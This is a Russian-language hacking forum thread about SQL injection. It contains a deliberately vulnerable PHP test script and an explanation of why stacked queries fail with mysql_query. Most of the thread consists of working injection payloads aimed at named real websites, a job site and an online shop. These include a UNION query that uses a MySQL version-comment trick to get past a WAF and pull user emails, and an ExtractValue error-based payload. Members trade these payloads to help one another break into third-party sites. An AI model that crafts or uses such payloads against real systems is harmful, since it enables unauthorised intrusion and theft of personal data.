 |
|
20.10.2012, 06:54
|
|
Новичок
Регистрация: 25.08.2012
Сообщений: 9
С нами:
7218326
Репутация:
0
|
|
Хм, но update или delete таким способом всё равно не сделать нельзя....... вроде близко бутерброд, а не укусишь)
Пробовал через скрипт регистрации пользователей, там емейл экранируется только апострофами. Но! Cначала делается select, а только потом запись... и валится на select-е, а не на записи...
|
|
|
20.10.2012, 13:31
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Только изучаю SQL Inj. Создал на локалке уязвимый php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]Новость №"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
}
exit;
}
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT text FROM news WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]MYSQL_ASSOC[/COLOR][COLOR="#007700"])) {
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
foreach ([/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$col_value[/COLOR][COLOR="#007700"]) {
print[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$col_value[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
При запросе http://localhost/mynews.php?id=1' вылетает скуля.
Ради интереса сделал такой запрос http://localhost/mynews.php?id=1; SELECT text FROM news WHERE id=2
В результате облом, хотя если сделать запрос через консоль SELECT text FROM news WHERE id=1; SELECT text FROM news WHERE id=2; то все ок. В чем проблема? |
|
|
|
20.10.2012, 13:55
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
mysql_query не поддерживает мультизапросы
Сообщение от None
mysql_query() посылает один запрос
(посылка нескольких запросов не поддерживается)
активной базе данных сервера, на который ссылается переданный дескриптор link_identifier.
|
|
|
|
20.10.2012, 15:48
|
|
Новичок
Регистрация: 25.08.2012
Сообщений: 9
С нами:
7218326
Репутация:
0
|
|
Подскажите, есть способы обхода такой вот защиты от инжектирования?
http://www.karyera.kz/article_01.php?p_ArticleID=19%20or%201=1
http://www.karyera.kz/article_01.php?p_ArticleID=19 and 0 union select null,null,null,null,email,null from tbl_person
|
|
|
|
20.10.2012, 16:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от postscripter
Подскажите, есть способы обхода такой вот защиты от инжектирования?
http://www.karyera.kz/article_01.php?p_ArticleID=19%20or%201=1
http://www.karyera.kz/article_01.php?p_ArticleID=19 and 0 union select null,null,null,null,email,null from tbl_person
http://www.karyera.kz/article_01.php?p_ArticleID=19+and+0+union( select+1,email,3,4,5,6+/*!from*/+tbl_person)--+
|
|
|
|
20.10.2012, 16:48
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от Konqi
http://www.karyera.kz/article_01.php?p_ArticleID=19+and+0+union(
select+1,email,3,4,5,6
+/*!from*/+tbl_person)--+
А почему в данном случае select не попадает под фильтр?
|
|
|
|
20.10.2012, 16:50
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от WendM
А почему в данном случае select не попадает под фильтр?
потому что ваф фильтрует связку "union+select"
|
|
|
|
20.10.2012, 16:58
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g-
'.html
Не могу раскрутить. Помогите плиз
|
|
|
|
20.10.2012, 17:07
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от WendM
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g-
'.html
Не могу раскрутить. Помогите плиз
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html
|
|
|
|
20.10.2012, 17:12
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от Konqi
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html
А что делает функция ExtractValue () ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
